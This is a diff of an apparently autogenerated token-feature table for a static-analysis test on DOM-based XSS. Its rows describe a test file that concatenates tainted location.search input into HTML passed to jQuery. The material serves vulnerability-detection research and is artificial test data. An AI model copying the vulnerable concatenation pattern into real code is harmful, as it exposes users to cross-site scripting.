    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:34:15:44 | defaultattr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:34:15:44 | defaultattr | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:49:15:54 | 'left' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:49:15:54 | 'left' | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:49:15:54 | 'left' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:49:15:54 | 'left' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:49:15:54 | 'left' | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:59:15:62 | '">' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:59:15:62 | '">' | contextSurroundingFunctionParameters | (attrs) | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:59:15:62 | '">' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | @@ -18441,12 +125724,117 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:76:15:83 | '
    ' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:76:15:83 | '
    ' | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:76:15:83 | '
    ' | stringConcatenatedWith | '
    ' + content -endpoint- | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:17:1 | this | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:17:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:17:1 | this | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:17:1 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:17:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | 'arguments' object of function indirection2 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | 'arguments' object of function indirection2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | 'arguments' object of function indirection2 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | 'arguments' object of function indirection2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | 'arguments' object of function indirection2 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | exceptional return of function indirection2 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | exceptional return of function indirection2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | exceptional return of function indirection2 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | exceptional return of function indirection2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | exceptional return of function indirection2 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | functio ... >');\\n\\t} | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | functio ... >');\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | functio ... >');\\n\\t} | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | functio ... >');\\n\\t} | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | functio ... >');\\n\\t} | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | return of function indirection2 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | return of function indirection2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | return of function indirection2 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | return of function indirection2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:2:19:2 | return of function indirection2 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:11:17:22 | indirection2 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:17:24:17:28 | attrs | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:23 | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:23 | '
    ' + content + '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:30 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:30 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:59 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:59 | exceptional return of '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:66 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:88 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:88 | exceptional return of '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:95 | '
    ') | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | '
    ') | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | '
    ') | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | '
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | '
    ') | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | exceptional return of '
    ') | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | exceptional return of '
    ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | exceptional return of '
    ') | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | exceptional return of '
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:10:18:105 | exceptional return of '
    ') | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:25:18:30 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:25:18:30 | concat | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:25:18:30 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:25:18:30 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:25:18:30 | concat | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:36 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:36 | attrs | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:36 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:36 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:36 | attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:48 | attrs.defaultattr | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:48 | attrs.defaultattr | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:48 | attrs.defaultattr | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:48 | attrs.defaultattr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:48 | attrs.defaultattr | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | CalleeFlexibleAccessPath | ?.concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18455,12 +125843,32 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | stringConcatenatedWith | '
    ' + content + '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:38:18:48 | defaultattr | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:38:18:48 | defaultattr | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:38:18:48 | defaultattr | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:38:18:48 | defaultattr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:38:18:48 | defaultattr | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:53:18:58 | 'left' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:53:18:58 | 'left' | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:53:18:58 | 'left' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:53:18:58 | 'left' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:53:18:58 | 'left' | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:61:18:66 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:61:18:66 | concat | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:61:18:66 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:61:18:66 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:61:18:66 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:71 | '">' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:71 | '">' | contextSurroundingFunctionParameters | (attrs) | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:71 | '">' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:71 | '">' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:71 | '">' | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:71 | '">' | stringConcatenatedWith | '
    '.concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:78 | '">'.concat | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:78 | '">'.concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:78 | '">'.concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:78 | '">'.concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | '">'.concat(content) | CalleeFlexibleAccessPath | ?.concat().concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | '">'.concat(content) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | '">'.concat(content) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18468,6 +125876,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | '">'.concat(content) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | '">'.concat(content) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | '">'.concat(content) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | exceptional return of '">'.concat(content) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | exceptional return of '">'.concat(content) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | exceptional return of '">'.concat(content) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | exceptional return of '">'.concat(content) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:68:18:87 | exceptional return of '">'.concat(content) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:73:18:78 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:73:18:78 | concat | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:73:18:78 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:73:18:78 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:73:18:78 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:80:18:86 | content | CalleeFlexibleAccessPath | ?.concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:80:18:86 | content | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:80:18:86 | content | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18476,6 +125894,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:80:18:86 | content | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:80:18:86 | content | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:80:18:86 | content | stringConcatenatedWith | '
    ' -endpoint- '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:90:18:95 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:90:18:95 | concat | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:90:18:95 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:90:18:95 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:90:18:95 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:97:18:104 | '
    ' | CalleeFlexibleAccessPath | ?.concat().concat().concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:97:18:104 | '
    ' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:97:18:104 | '
    ' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18484,6 +125907,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:97:18:104 | '
    ' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:97:18:104 | '
    ' | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:18:97:18:104 | '
    ' | stringConcatenatedWith | '
    ' + content -endpoint- | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | $(indir ... attrs)) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | $(indir ... attrs)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | $(indir ... attrs)) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | $(indir ... attrs)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | $(indir ... attrs)) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | exceptional return of $(indir ... attrs)) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | exceptional return of $(indir ... attrs)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:20:2:20:48 | exceptional return of $(indir ... attrs)) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
